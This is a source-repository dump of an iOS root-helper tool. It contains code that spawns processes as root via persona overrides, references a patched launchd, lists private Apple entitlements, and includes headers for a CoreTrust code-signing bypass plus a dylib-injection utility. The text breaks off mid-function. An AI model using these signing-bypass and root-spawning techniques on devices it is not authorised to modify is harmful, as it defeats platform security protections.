getNSStringFromFile(int fd) { NSMutableString* ms = [NSMutableString new]; ssize_t num_read; char c; while((num_read = read(fd, &c, sizeof(c)))) { [ms appendString:[NSString stringWithFormat:@"%c", c]]; } return ms.copy; } void printMultilineNSString(NSString* stringToPrint) { NSCharacterSet *separator = [NSCharacterSet newlineCharacterSet]; NSArray* lines = [stringToPrint componentsSeparatedByCharactersInSet:separator]; for(NSString* line in lines) { NSLog(@"%@", line); } } int spawnRoot(NSString* path, NSArray* args, NSString** stdOut, NSString** stdErr) { NSMutableArray* argsM = args.mutableCopy ?: [NSMutableArray new]; [argsM insertObject:path.lastPathComponent atIndex:0]; NSUInteger argCount = [argsM count]; char **argsC = (char **)malloc((argCount + 1) * sizeof(char*)); for (NSUInteger i = 0; i < argCount; i++) { argsC[i] = strdup([[argsM objectAtIndex:i] UTF8String]); } argsC[argCount] = NULL; posix_spawnattr_t attr; posix_spawnattr_init(&attr); posix_spawnattr_set_persona_np(&attr, 99, POSIX_SPAWN_PERSONA_FLAGS_OVERRIDE); posix_spawnattr_set_persona_uid_np(&attr, 0); posix_spawnattr_set_persona_gid_np(&attr, 0); posix_spawn_file_actions_t action; posix_spawn_file_actions_init(&action); int outErr[2]; if(stdErr) { pipe(outErr); posix_spawn_file_actions_adddup2(&action, outErr[1], STDERR_FILENO); posix_spawn_file_actions_addclose(&action, outErr[0]); } int out[2]; if(stdOut) { pipe(out); posix_spawn_file_actions_adddup2(&action, out[1], STDOUT_FILENO); posix_spawn_file_actions_addclose(&action, out[0]); } pid_t task_pid; int status = -200; int spawnError = posix_spawn(&task_pid, [path UTF8String], &action, &attr, (char* const*)argsC, NULL); posix_spawnattr_destroy(&attr); for (NSUInteger i = 0; i < argCount; i++) { free(argsC[i]); } free(argsC); if(spawnError != 0) { NSLog(@"posix_spawn error %d\n", spawnError); return spawnError; } do { if (waitpid(task_pid, &status, 0) != -1) { NSLog(@"Child status %d", WEXITSTATUS(status)); } else { perror("waitpid"); return -222; } } while (!WIFEXITED(status) && !WIFSIGNALED(status)); if(stdOut) { close(out[1]); NSString* output = getNSStringFromFile(out[0]); *stdOut = output; } if(stdErr) { close(outErr[1]); NSString* errorOutput = getNSStringFromFile(outErr[0]); *stdErr = errorOutput; } return WEXITSTATUS(status); } void enumerateProcessesUsingBlock(void (^enumerator)(pid_t pid, NSString* executablePath, BOOL* stop)) { static int maxArgumentSize = 0; if (maxArgumentSize == 0) { size_t size = sizeof(maxArgumentSize); if (sysctl((int[]){ CTL_KERN, KERN_ARGMAX }, 2, &maxArgumentSize, &size, NULL, 0) == -1) { perror("sysctl argument size"); maxArgumentSize = 4096; // Default } } int mib[3] = { CTL_KERN, KERN_PROC, KERN_PROC_ALL}; struct kinfo_proc *info; size_t length; int count; if (sysctl(mib, 3, NULL, &length, NULL, 0) < 0) return; if (!(info = malloc(length))) return; if (sysctl(mib, 3, info, &length, NULL, 0) < 0) { free(info); return; } count = length / sizeof(struct kinfo_proc); for (int i = 0; i < count; i++) { @autoreleasepool { pid_t pid = info[i].kp_proc.p_pid; if (pid == 0) { continue; } size_t size = maxArgumentSize; char* buffer = (char *)malloc(length); if (sysctl((int[]){ CTL_KERN, KERN_PROCARGS2, pid }, 3, buffer, &size, NULL, 0) == 0) { NSString* executablePath = [NSString stringWithCString:(buffer+sizeof(int)) encoding:NSUTF8StringEncoding]; BOOL stop = NO; enumerator(pid, executablePath, &stop); if(stop) { free(buffer); break; } } free(buffer); } } free(info); } void killall(NSString* processName) { enumerateProcessesUsingBlock(^(pid_t pid, NSString* executablePath, BOOL* stop) { if([executablePath.lastPathComponent isEqualToString:processName]) { kill(pid, SIGTERM); } }); } void respring(void) { killall(@"SpringBoard"); exit(0); } int get_boot_manifest_hash(char hash[97]) { const UInt8 *bytes; CFIndex length; io_registry_entry_t chosen = IORegistryEntryFromPath(0, "IODeviceTree:/chosen"); if (!MACH_PORT_VALID(chosen)) return 1; CFDataRef manifestHash = (CFDataRef)IORegistryEntryCreateCFProperty(chosen, CFSTR("boot-manifest-hash"), kCFAllocatorDefault, 0); IOObjectRelease(chosen); if (manifestHash == NULL || CFGetTypeID(manifestHash) != CFDataGetTypeID()) { if (manifestHash != NULL) CFRelease(manifestHash); return 1; } length = CFDataGetLength(manifestHash); bytes = CFDataGetBytePtr(manifestHash); for (int i = 0; i < length; i++) { snprintf(&hash[i * 2], 3, "%02X", bytes[i]); } CFRelease(manifestHash); return 0; } char* return_boot_manifest_hash_main(void) { static char hash[97]; int ret = get_boot_manifest_hash(hash); if (ret != 0) { fprintf(stderr, "could not get boot manifest hash\n"); return "lmao"; } static char result[115]; sprintf(result, "/private/preboot/%s", hash); return result; } char* getPatchedLaunchdCopy(void) { char* prebootpath = return_boot_manifest_hash_main(); static char originallaunchd[256]; sprintf(originallaunchd, "%s/%s", prebootpath, "patchedlaunchd"); NSLog(@"patchedlaunchd: %s", originallaunchd); return originallaunchd; } char* getOriginalLaunchdCopy(void) { char* prebootpath = return_boot_manifest_hash_main(); static char originallaunchd[256]; sprintf(originallaunchd, "%s/%s", prebootpath, "patchedlaunchd"); NSLog(@"patchedlaunchd: %s", originallaunchd); return originallaunchd; } ================================================ FILE: RootHelperSample/control ================================================ Package: net.sourceloc.trolltoolsroothelper Name: trolltoolsroothelper Version: 1.0 Architecture: iphoneos-arm Description: TrollToolsRootHelper Maintainer: sourcelocation Author: sourcelocation Section: System Tag: role::hacker ================================================ FILE: RootHelperSample/entitlements.plist ================================================ com.apple.private.domain-extension com.apple.private.security.container-required com.apple.private.security.no-container com.apple.private.xpc.domain-extension com.apple.private.xpc.domain-extension.proxy com.apple.private.xpc.launchd.app-state-manager com.apple.private.xpc.launchd.enable-disable-system-services com.apple.private.xpc.launchd.event-monitor com.apple.private.xpc.launchd.loginitem-bootstrapper com.apple.private.xpc.launchd.loginitem-outside-bundle com.apple.private.xpc.launchd.obliterator com.apple.private.xpc.launchd.per-user-create.mbsetupuser com.apple.private.xpc.launchd.per-user-lookup com.apple.private.xpc.launchd.reboot com.apple.private.xpc.launchd.service-hold com.apple.private.xpc.launchd.userspace-reboot com.apple.private.xpc.launchd.userspace-reboot-now com.apple.private.xpc.persona-creator com.apple.private.xpc.persona-manager com.apple.private.persona-mgmt com.apple.private.xpc.service-attach com.apple.private.xpc.service-configure platform-application get-task-allow com.apple.private.security.storage.AppBundles com.apple.private.security.storage.AppDataContainers com.apple.security.exception.mach-lookup.global-name com.apple.mmaintenanced com.apple.memory-maintenance ================================================ FILE: RootHelperSample/external/include/choma/Base64.h ================================================ #ifndef BASE64_H #define BASE64_H #include #include char *base64_encode(const unsigned char *data, size_t input_length, size_t *output_length); #endif // BASE64_H ================================================ FILE: RootHelperSample/external/include/choma/BufferedStream.h ================================================ #ifndef BUFFERED_STREAM_H #define BUFFERED_STREAM_H #include "MemoryStream.h" #include #define BUFFERED_STREAM_FLAG_AUTO_EXPAND (1 << 0) typedef struct BufferedStreamContext { uint8_t *buffer; size_t bufferSize; uint32_t subBufferStart; size_t subBufferSize; } BufferedStreamContext; MemoryStream *buffered_stream_init_from_buffer_nocopy(void *buffer, size_t bufferSize, uint32_t flags); MemoryStream *buffered_stream_init_from_buffer(void *buffer, size_t bufferSize, uint32_t flags); #endif // BUFFERED_STREAM_H ================================================ FILE: RootHelperSample/external/include/choma/CSBlob.h ================================================ #ifndef CS_BLOB_H #define CS_BLOB_H #include #include #include #include #include "FAT.h" #include "MachO.h" #include "MemoryStream.h" // Blob index typedef struct __BlobIndex { uint32_t type; uint32_t offset; } CS_BlobIndex; // CMS superblob typedef struct __SuperBlob { uint32_t magic; uint32_t length; uint32_t count; CS_BlobIndex index[]; } CS_SuperBlob; typedef struct __GenericBlob { uint32_t magic; /* magic number */ uint32_t length; /* total length of blob */ char data[]; } CS_GenericBlob; // CMS blob magic types enum { CSBLOB_REQUIREMENT = 0xfade0c00, CSBLOB_REQUIREMENTS = 0xfade0c01, CSBLOB_CODEDIRECTORY = 0xfade0c02, CSBLOB_EMBEDDED_SIGNATURE = 0xfade0cc0, CSBLOB_DETACHED_SIGNATURE = 0xfade0cc1, CSBLOB_ENTITLEMENTS = 0xfade7171, CSBLOB_DER_ENTITLEMENTS = 0xfade7172, CSBLOB_SIGNATURE_BLOB = 0xfade0b01 } CS_BlobType; enum { CSSLOT_CODEDIRECTORY = 0, CSSLOT_INFOSLOT = 1, CSSLOT_REQUIREMENTS = 2, CSSLOT_RESOURCEDIR = 3, CSSLOT_APPLICATION = 4, CSSLOT_ENTITLEMENTS = 5, CSSLOT_DER_ENTITLEMENTS = 7, CSSLOT_ALTERNATE_CODEDIRECTORIES = 0x1000, CSSLOT_ALTERNATE_CODEDIRECTORY_MAX = 5, CSSLOT_ALTERNATE_CODEDIRECTORY_LIMIT = CSSLOT_ALTERNATE_CODEDIRECTORIES + CSSLOT_ALTERNATE_CODEDIRECTORY_MAX, CSSLOT_SIGNATURESLOT = 0x10000 } CS_SlotType; typedef struct s_CS_DecodedBlob { struct s_CS_DecodedBlob *next; uint32_t type; MemoryStream *stream; } CS_DecodedBlob; typedef struct s_CS_DecodedSuperBlob { uint32_t magic; struct s_CS_DecodedBlob *firstBlob; } CS_DecodedSuperBlob; // Convert blob magic to readable blob type string char *cs_blob_magic_to_string(int magic); // Extract Code Signature to file int macho_extract_cs_to_file(MachO *macho, CS_SuperBlob *superblob); int macho_find_code_signature_bounds(MachO *macho, uint32_t *offsetOut, uint32_t *sizeOut); CS_SuperBlob *macho_read_code_signature(MachO *macho); int macho_replace_code_signature(MachO *macho, CS_SuperBlob *superblob); int update_load_commands(MachO *macho, CS_SuperBlob *superblob, uint64_t originalSize); CS_DecodedBlob *csd_blob_init(uint32_t type, CS_GenericBlob *blobData); int csd_blob_read(CS_DecodedBlob *blob, uint64_t offset, size_t size, void *outBuf); int csd_blob_write(CS_DecodedBlob *blob, uint64_t offset, size_t size, const void *inBuf); int csd_blob_insert(CS_DecodedBlob *blob, uint64_t offset, size_t size, const void *inBuf); int csd_blob_delete(CS_DecodedBlob *blob, uint64_t offset, size_t size); int csd_blob_read_string(CS_DecodedBlob *blob, uint64_t offset, char **outString); int csd_blob_write_string(CS_DecodedBlob *blob, uint64_t offset, const char *string); int csd_blob_get_size(CS_DecodedBlob *blob); uint32_t csd_blob_get_type(CS_DecodedBlob *blob); void csd_blob_set_type(CS_DecodedBlob *blob, uint32_t type); void csd_blob_free(CS_DecodedBlob *blob); CS_DecodedSuperBlob *csd_superblob_decode(CS_SuperBlob *superblob); CS_SuperBlob *csd_superblob_encode(CS_DecodedSuperBlob *decodedSuperblob); CS_DecodedBlob *csd_superblob_find_blob(CS_DecodedSuperBlob *superblob, uint32_t type, uint32_t *indexOut); int csd_superblob_insert_blob_after_blob(CS_DecodedSuperBlob *superblob, CS_DecodedBlob *blobToInsert, CS_DecodedBlob *afterBlob); int csd_superblob_insert_blob_at_index(CS_DecodedSuperBlob *superblob, CS_DecodedBlob *blobToInsert, uint32_t atIndex); int csd_superblob_append_blob(CS_DecodedSuperBlob *superblob, CS_DecodedBlob *blobToAppend); int csd_superblob_remove_blob(CS_DecodedSuperBlob *superblob, CS_DecodedBlob *blobToRemove); // <- Important: When calling this, caller is responsible for freeing blobToRemove int csd_superblob_remove_blob_at_index(CS_DecodedSuperBlob *superblob, uint32_t atIndex); int csd_superblob_print_content(CS_DecodedSuperBlob *decodedSuperblob, MachO *macho, bool printAllSlots, bool verifySlots); void csd_superblob_free(CS_DecodedSuperBlob *decodedSuperblob); #endif // CS_BLOB_H ================================================ FILE: RootHelperSample/external/include/choma/CodeDirectory.h ================================================ #ifndef CODE_DIRECTORY_H #define CODE_DIRECTORY_H #include #include #include #include "MachO.h" #include "CSBlob.h" #include "FAT.h" #include "MachOByteOrder.h" #include "MachOLoadCommand.h" #include "MemoryStream.h" // Code directory blob header typedef struct __CodeDirectory { uint32_t magic; uint32_t length; uint32_t version; uint32_t flags; uint32_t hashOffset; uint32_t identOffset; uint32_t nSpecialSlots; uint32_t nCodeSlots; uint32_t codeLimit; uint8_t hashSize; uint8_t hashType; uint8_t spare1; uint8_t pageSize; uint32_t spare2; uint32_t scatterOffset; uint32_t teamOffset; } CS_CodeDirectory; enum CS_HashType { CS_HASHTYPE_SHA160_160 = 1, CS_HASHTYPE_SHA256_256 = 2, CS_HASHTYPE_SHA256_160 = 3, CS_HASHTYPE_SHA384_384 = 4, }; char *csd_code_directory_copy_identity(CS_DecodedBlob *codeDirBlob, uint32_t *offsetOut); char *csd_code_directory_copy_team_id(CS_DecodedBlob *codeDirBlob, uint32_t *offsetOut); int csd_code_directory_set_team_id(CS_DecodedBlob *codeDirBlob, char *newTeamID); uint32_t csd_code_directory_get_flags(CS_DecodedBlob *codeDirBlob); void csd_code_directory_set_flags(CS_DecodedBlob *codeDirBlob, uint32_t flags); uint8_t csd_code_directory_get_hash_type(CS_DecodedBlob *codeDirBlob); void csd_code_directory_set_hash_type(CS_DecodedBlob *codeDirBlob, uint8_t hashType); int csd_code_directory_print_content(CS_DecodedBlob *codeDirBlob, MachO *macho, bool printSlots, bool verifySlots); void csd_code_directory_update(CS_DecodedBlob *codeDirBlob, MachO *macho); #endif // CODE_DIRECTORY_H ================================================ FILE: RootHelperSample/external/include/choma/FAT.h ================================================ #ifndef MACHO_H #define MACHO_H #include #include #include #include #include #include #include "MemoryStream.h" typedef struct MachO MachO; // A FAT structure can either represent a FAT file with multiple slices, in which the slices will be loaded into the slices attribute // Or a single slice MachO, in which case it serves as a compatibility layer and the single slice will also be loaded into the slices attribute typedef struct FAT { MemoryStream *stream; MachO **slices; uint32_t slicesCount; int fileDescriptor; } FAT; int fat_read_at_offset(FAT *fat, uint64_t offset, size_t size, void *outBuf); MemoryStream *fat_get_stream(FAT *fat); // Initialise a FAT structure from a memory stream FAT *fat_init_from_memory_stream(MemoryStream *stream); // Initialise a FAT structure using the path to the file FAT *fat_init_from_path(const char *filePath); //FAT *fat_init_from_path_for_writing(const char *filePath); // Find macho with cputype and cpusubtype in FAT, returns NULL if not found MachO *fat_find_slice(FAT *fat, cpu_type_t cputype, cpu_subtype_t cpusubtype); // Free all elements of the FAT structure void fat_free(FAT *fat); #endif // MACHO_H ================================================ FILE: RootHelperSample/external/include/choma/FileStream.h ================================================ #ifndef FILE_STREAM_H #define FILE_STREAM_H #include "MemoryStream.h" #define FILE_STREAM_SIZE_AUTO 0 #define FILE_STREAM_FLAG_WRITABLE (1 << 0) #define FILE_STREAM_FLAG_AUTO_EXPAND (1 << 1) typedef struct FileStreamContext { int fd; size_t fileSize; uint32_t bufferStart; size_t bufferSize; } FileStreamContext; MemoryStream *file_stream_init_from_file_descriptor_nodup(int fd, uint32_t bufferStart, size_t bufferSize, uint32_t flags); MemoryStream *file_stream_init_from_file_descriptor(int fd, uint32_t bufferStart, size_t bufferSize, uint32_t flags); MemoryStream *file_stream_init_from_path(const char *path, uint32_t bufferStart, size_t bufferSize, uint32_t flags); #endif // FILE_STREAM_H ================================================ FILE: RootHelperSample/external/include/choma/Host.h ================================================ #ifndef HOST_H #define HOST_H #include "FAT.h" // Retrieve the preferred MachO slice from a FAT // Preferred slice as in the slice that the kernel would use when loading the file MachO *fat_find_preferred_slice(FAT *fat); #endif // HOST_H ================================================ FILE: RootHelperSample/external/include/choma/MachO.h ================================================ #ifndef MACHO_SLICE_H #define MACHO_SLICE_H #include #include #include #include "MemoryStream.h" #include "FAT.h" typedef struct MachOSegment { struct segment_command_64 command; struct section_64 sections[]; } __attribute__((__packed__)) MachOSegment; typedef struct FilesetMachO { char *entry_id; uint64_t vmaddr; uint64_t fileoff; FAT *underlyingMachO; } FilesetMachO; typedef struct MachO { MemoryStream *stream; bool isSupported; struct mach_header_64 machHeader; struct fat_arch_64 archDescriptor; uint32_t filesetCount; FilesetMachO *filesetMachos; uint32_t segmentCount; MachOSegment **segments; } MachO; // Read data from a MachO at a specified offset int macho_read_at_offset(MachO *macho, uint64_t offset, size_t size, void *outBuf); // Write data from a MachO at a specified offset, auto expands, only works if opened via macho_init_for_writing int macho_write_at_offset(MachO *macho, uint64_t offset, size_t size, void *inBuf); MemoryStream *macho_get_stream(MachO *macho); uint32_t macho_get_filetype(MachO *macho); // Perform translation between file offsets and virtual addresses int macho_translate_fileoff_to_vmaddr(MachO *macho, uint64_t fileoff, uint64_t *vmaddrOut, MachOSegment **segmentOut); int macho_translate_vmaddr_to_fileoff(MachO *macho, uint64_t vmaddr, uint64_t *fileoffOut, MachOSegment **segmentOut); // Read data from a MachO at a specified virtual address int macho_read_at_vmaddr(MachO *macho, uint64_t vmaddr, size_t size, void *outBuf); int macho_enumerate_load_commands(MachO *macho, void (^enumeratorBlock)(struct load_command loadCommand, uint64_t offset, void *cmd, bool *stop)); // Initialise a MachO object from a MemoryStream and it's corresponding FAT arch descriptor MachO *macho_init(MemoryStream *stream, struct fat_arch_64 archDescriptor); // Initialize a single slice macho for writing to it MachO *macho_init_for_writing(const char *filePath); void macho_free(MachO *macho); #endif // MACHO_SLICE_H ================================================ FILE: RootHelperSample/external/include/choma/MachOByteOrder.h ================================================ #ifndef MACHO_BYTE_ORDER_H #define MACHO_BYTE_ORDER_H #include #include // 8-bit integers needed for CodeDirectory #define BIG_TO_HOST(n) _Generic((n), \ int8_t: n, \ uint8_t: n, \ int16_t: OSSwapBigToHostInt16(n), \ uint16_t: OSSwapBigToHostInt16(n), \ int32_t: OSSwapBigToHostInt32(n), \ uint32_t: OSSwapBigToHostInt32(n), \ int64_t: OSSwapBigToHostInt64(n), \ uint64_t: OSSwapBigToHostInt64(n) \ ) #define HOST_TO_BIG(n) _Generic((n), \ int8_t: n, \ uint8_t: n, \ uint16_t: OSSwapHostToBigInt16(n), \ int16_t: OSSwapHostToBigInt16(n), \ int32_t: OSSwapHostToBigInt32(n), \ uint32_t: OSSwapHostToBigInt32(n), \ int64_t: OSSwapHostToBigInt64(n), \ uint64_t: OSSwapHostToBigInt64(n) \ ) #define LITTLE_TO_HOST(n) _Generic((n), \ int8_t: n, \ uint8_t: n, \ int16_t: OSSwapLittleToHostInt16(n), \ uint16_t: OSSwapLittleToHostInt16(n), \ int32_t: OSSwapLittleToHostInt32(n), \ uint32_t: OSSwapLittleToHostInt32(n), \ int64_t: OSSwapLittleToHostInt64(n), \ uint64_t: OSSwapLittleToHostInt64(n) \ ) #define HOST_TO_LITTLE(n) _Generic((n), \ int8_t: n, \ uint8_t: n, \ int16_t: OSSwapHostToLittleInt16(n), \ uint16_t: OSSwapHostToLittleInt16(n), \ int32_t: OSSwapHostToLittleInt32(n), \ uint32_t: OSSwapHostToLittleInt32(n), \ int64_t: OSSwapHostToLittleInt64(n), \ uint64_t: OSSwapHostToLittleInt64(n) \ ) #define HOST_TO_LITTLE_APPLIER(instance, member) \ (instance)->member = HOST_TO_LITTLE((instance)->member) #define HOST_TO_BIG_APPLIER(instance, member) \ (instance)->member = HOST_TO_BIG((instance)->member) #define LITTLE_TO_HOST_APPLIER(instance, member) \ (instance)->member = LITTLE_TO_HOST((instance)->member) #define BIG_TO_HOST_APPLIER(instance, member) \ (instance)->member = BIG_TO_HOST((instance)->member) #define FAT_HEADER_APPLY_BYTE_ORDER(fh, applier) \ applier(fh, magic); \ applier(fh, nfat_arch); #define FAT_ARCH_APPLY_BYTE_ORDER(arch, applier) \ applier(arch, cputype); \ applier(arch, cpusubtype); \ applier(arch, offset); \ applier(arch, size); \ applier(arch, align); \ #define FAT_ARCH_64_APPLY_BYTE_ORDER(arch, applier) \ applier(arch, cputype); \ applier(arch, cpusubtype); \ applier(arch, offset); \ applier(arch, size); \ applier(arch, align); \ applier(arch, reserved); \ #define MACH_HEADER_APPLY_BYTE_ORDER(mh, applier) \ applier(mh, magic); \ applier(mh, cputype); \ applier(mh, cpusubtype); \ applier(mh, filetype); \ applier(mh, ncmds); \ applier(mh, sizeofcmds); \ applier(mh, reserved); #define LOAD_COMMAND_APPLY_BYTE_ORDER(lc, applier) \ applier(lc, cmd); \ applier(lc, cmdsize); #define LINKEDIT_DATA_COMMAND_APPLY_BYTE_ORDER(lc, applier) \ applier(lc, cmd); \ applier(lc, cmdsize); \ applier(lc, dataoff); \ applier(lc, datasize); #define BLOB_INDEX_APPLY_BYTE_ORDER(bi, applier) \ applier(bi, type); \ applier(bi, offset); #define SUPERBLOB_APPLY_BYTE_ORDER(sb, applier) \ applier(sb, magic); \ applier(sb, length); \ applier(sb, count); #define GENERIC_BLOB_APPLY_BYTE_ORDER(gb, applier) \ applier(gb, magic); \ applier(gb, length); #define CODE_DIRECTORY_APPLY_BYTE_ORDER(cd, applier) \ applier(cd, magic); \ applier(cd, length); \ applier(cd, version); \ applier(cd, flags); \ applier(cd, hashOffset); \ applier(cd, identOffset); \ applier(cd, nSpecialSlots); \ applier(cd, nCodeSlots); \ applier(cd, codeLimit); \ applier(cd, hashSize); \ applier(cd, hashType); \ applier(cd, spare1); \ applier(cd, pageSize); \ applier(cd, spare2); \ applier(cd, scatterOffset); \ applier(cd, teamOffset); #define SEGMENT_COMMAND_64_APPLY_BYTE_ORDER(sc64, applier) \ applier(sc64, cmd); \ applier(sc64, cmdsize); \ applier(sc64, fileoff); \ applier(sc64, filesize); \ applier(sc64, vmaddr); \ applier(sc64, vmsize); \ applier(sc64, flags); \ applier(sc64, initprot); \ applier(sc64, maxprot); \ applier(sc64, nsects); #define SECTION_64_APPLY_BYTE_ORDER(sc64, applier) \ applier(sc64, addr); \ applier(sc64, align); \ applier(sc64, flags); \ applier(sc64, nreloc); \ applier(sc64, offset); \ applier(sc64, reserved1); \ applier(sc64, reserved2); \ applier(sc64, reserved3); \ applier(sc64, size); #define FILESET_ENTRY_COMMAND_APPLY_BYTE_ORDER(fse, applier) \ applier(fse, cmd); \ applier(fse, cmdsize); \ applier(fse, vmaddr); \ applier(fse, fileoff); \ applier(fse, entry_id.offset); \ applier(fse, reserved); \ #endif // MACHO_BYTE_ORDER_H ================================================ FILE: RootHelperSample/external/include/choma/MachOLoadCommand.h ================================================ #ifndef MACHO_LOAD_COMMAND_H #define MACHO_LOAD_COMMAND_H #include #include "MachO.h" #include "CSBlob.h" #include "FileStream.h" #include "MachOByteOrder.h" // Convert load command to load command name char *load_command_to_string(int loadCommand); void update_segment_command_64(MachO *macho, const char *segmentName, uint64_t vmaddr, uint64_t vmsize, uint64_t fileoff, uint64_t filesize); void update_lc_code_signature(MachO *macho, uint64_t size); int update_load_commands_for_coretrust_bypass(MachO *macho, CS_SuperBlob *superblob, uint64_t originalCodeSignatureSize, uint64_t originalMachOSize); #endif // MACHO_LOAD_COMMAND_H ================================================ FILE: RootHelperSample/external/include/choma/MemoryStream.h ================================================ #ifndef MEMORY_STREAM_H #define MEMORY_STREAM_H #include #include #include #include #include #include #include #define MEMORY_STREAM_FLAG_OWNS_DATA (1 << 0) #define MEMORY_STREAM_FLAG_MUTABLE (1 << 1) #define MEMORY_STREAM_FLAG_AUTO_EXPAND (1 << 2) #define MEMORY_STREAM_SIZE_INVALID (size_t)-1 // A generic memory IO interface that is used throughout this project // Can be backed by anything, just the functions have to be implemented typedef struct s_MemoryStream { void *context; uint32_t flags; int (*read)(struct s_MemoryStream *stream, uint64_t offset, size_t size, void *outBuf); int (*write)(struct s_MemoryStream *stream, uint64_t offset, size_t size, const void *inBuf); int (*getSize)(struct s_MemoryStream *stream, size_t *sizeOut); uint8_t *(*getRawPtr)(struct s_MemoryStream *stream); int (*trim)(struct s_MemoryStream *stream, size_t trimAtStart, size_t trimAtEnd); int (*expand)(struct s_MemoryStream *stream, size_t expandAtStart, size_t expandAtEnd); struct s_MemoryStream *(*hardclone)(struct s_MemoryStream *stream); struct s_MemoryStream *(*softclone)(struct s_MemoryStream *stream); void (*free)(struct s_MemoryStream *stream); } MemoryStream; int memory_stream_read(MemoryStream *stream, uint64_t offset, size_t size, void *outBuf); int memory_stream_write(MemoryStream *stream, uint64_t offset, size_t size, const void *inBuf); int memory_stream_insert(MemoryStream *stream, uint64_t offset, size_t size, const void *inBuf); int memory_stream_delete(MemoryStream *stream, uint64_t offset, size_t size); int memory_stream_read_string(MemoryStream *stream, uint64_t offset, char **outString); int memory_stream_write_string(MemoryStream *stream, uint64_t offset, const char *string); size_t memory_stream_get_size(MemoryStream *stream); uint8_t *memory_stream_get_raw_pointer(MemoryStream *stream); uint32_t memory_stream_get_flags(MemoryStream *stream); MemoryStream *memory_stream_softclone(MemoryStream *stream); MemoryStream *memory_stream_hardclone(MemoryStream *stream); int memory_stream_trim(MemoryStream *stream, size_t trimAtStart, size_t trimAtEnd); int memory_stream_expand(MemoryStream *stream, size_t expandAtStart, size_t expandAtEnd); void memory_stream_free(MemoryStream *stream); int memory_stream_copy_data(MemoryStream *originStream, uint64_t originOffset, MemoryStream *targetStream, uint64_t targetOffset, size_t size); int memory_stream_find_memory(MemoryStream *stream, uint64_t searchOffset, size_t searchSize, void *bytes, void *mask, size_t nbytes, uint16_t alignment, uint64_t *foundOffsetOut); #endif // MEMORY_STREAM_H ================================================ FILE: RootHelperSample/external/include/choma/PatchFinder.h ================================================ #include #include "MachO.h" #define METRIC_TYPE_PATTERN 1 #define METRIC_TYPE_STRING_XREF 2 #define METRIC_TYPE_FUNCTION_XREF 3 typedef struct PFSection { uint64_t fileoff; uint64_t vmaddr; uint64_t size; uint8_t *cache; bool ownsCache; } PFSection; PFSection *macho_patchfinder_create_section(MachO *macho, const char *filesetEntryId, const char *segName, const char *sectName); int macho_patchfinder_cache_section(PFSection *section, MachO *fromMacho); void macho_patchfinder_section_free(PFSection *section); typedef struct MetricShared { uint32_t type; PFSection *section; } MetricShared; typedef enum { BYTE_PATTERN_ALIGN_8_BIT, BYTE_PATTERN_ALIGN_16_BIT, BYTE_PATTERN_ALIGN_32_BIT, BYTE_PATTERN_ALIGN_64_BIT, } BytePatternAlignment; typedef struct BytePatternMetric { MetricShared shared; void *bytes; void *mask; size_t nbytes; BytePatternAlignment alignment; } BytePatternMetric; BytePatternMetric *macho_patchfinder_create_byte_pattern_metric(PFSection *section, void *bytes, void *mask, size_t nbytes, BytePatternAlignment alignment); void macho_patchfinder_run_metric(MachO *macho, void *metric, void (^matchBlock)(uint64_t vmaddr, bool *stop)); ================================================ FILE: RootHelperSample/external/include/choma/SignOSSL.h ================================================ #ifndef SIGN_OSSL_H #define SIGN_OSSL_H #include #include #include #include #include #include #include unsigned char *signWithRSA(unsigned char *inputData, size_t inputDataLength, unsigned char *key, size_t key_len, size_t *outputDataLength); #endif // SIGN_OSSL_H // 0xA422 ================================================ FILE: RootHelperSample/external/include/choma/Signing.h ================================================ #ifndef SIGNING_H #define SIGNING_H #include #include #include #include #include // int signWithRSA(const char *certificateFile, const char *inputFile, const char *outputFile); #endif // SIGNING_H ================================================ FILE: RootHelperSample/external/include/choma/Util.h ================================================ #include #include uint64_t align_to_size(int size, int alignment); int count_digits(int64_t num); void print_hash(uint8_t *hash, size_t size); ================================================ FILE: RootHelperSample/external/lib/libcrypto.a ================================================ [File too large to display: 18.6 MB] ================================================ FILE: RootHelperSample/insert_dylib.h ================================================ // // insert_dylib.h // kfd // // Created by Alfie on 02/01/2024. // #ifndef insert_dylib_h #define insert_dylib_h int insert_dylib_main(const char *dylib_path, const char *binary_path); #endif /* insert_dylib_h */ ================================================ FILE: RootHelperSample/insert_dylib.m ================================================ // https://github.com/tyilo/insert_dylib // thanks Alfie #include #include #include #include #include #include #include #include #include #include #include #include #include "insert_dylib.h" #include void NSLogC(const char *format, ...) { va_list args; va_start(args, format); vprintf(format, args); va_end(args); va_start(args, format); NSString *logString = [[NSString alloc] initWithFormat:[NSString stringWithUTF8String:format] arguments:args]; NSLog(@"%@", logString); va_end(args); } #define IS_64_BIT(x) ((x) == MH_MAGIC_64 || (x) == MH_CIGAM_64) #define IS_LITTLE_ENDIAN(x) ((x) == FAT_CIGAM || (x) == MH_CIGAM_64 || (x) == MH_CIGAM) #define SWAP32(x, magic) (IS_LITTLE_ENDIAN(magic)? OSSwapInt32(x): (x)) #define SWAP64(x, magic) (IS_LITTLE_ENDIAN(magic)? OSSwapInt64(x): (x)) #define ROUND_UP(x, y) (((x) + (y) - 1) & -(y)) #define ABSDIFF(x, y) ((x) > (y)? (uintmax_t)(x) - (uintmax_t)(y): (uintmax_t)(y) - (uintmax_t)(x)) #define BUFSIZE 512 void fbzero(FILE *f, off_t offset, size_t len) { static unsigned char zeros[BUFSIZE] = {0}; fseeko(f, offset, SEEK_SET); while(len != 0) { size_t size = MIN(len, sizeof(zeros)); fwrite(zeros, size, 1, f); len -= size; } } void fmemmove(FILE *f, off_t dst, off_t src, size_t len) { static unsigned char buf[BUFSIZE]; while(len != 0) { size_t size = MIN(len, sizeof(buf)); fseeko(f, src, SEEK_SET); fread(&buf, size, 1, f); fseeko(f, dst, SEEK_SET); fwrite(buf, size, 1, f); len -= size; src += size; dst += size; } } int inplace_flag = false; int weak_flag = false; int overwrite_flag = false; int codesig_flag = 0; int yes_flag = false; static struct option long_options[] = { {"inplace", no_argument, &inplace_flag, true}, {"weak", no_argument, &weak_flag, true}, {"overwrite", no_argument, &overwrite_flag, true}, {"strip-codesig", no_argument, &codesig_flag, 1}, {"no-strip-codesig", no_argument, &codesig_flag, 2}, {"all-yes", no_argument, &yes_flag, true}, {NULL, 0, NULL, 0} }; __attribute__((noreturn)) void usage(void) { NSLogC("[kfdHaxx] insert_dylib: Usage: insert_dylib dylib_path binary_path [new_binary_path]\n"); NSLogC("[kfdHaxx] insert_dylib: Option flags:"); struct option *opt = long_options; while(opt->name != NULL) { NSLogC("[kfdHaxx] insert_dylib: --%s", opt->name); opt++; } NSLogC("[kfdHaxx] insert_dylib: \n"); exit(1); } __attribute__((format(printf, 1, 2))) bool ask(const char *format, 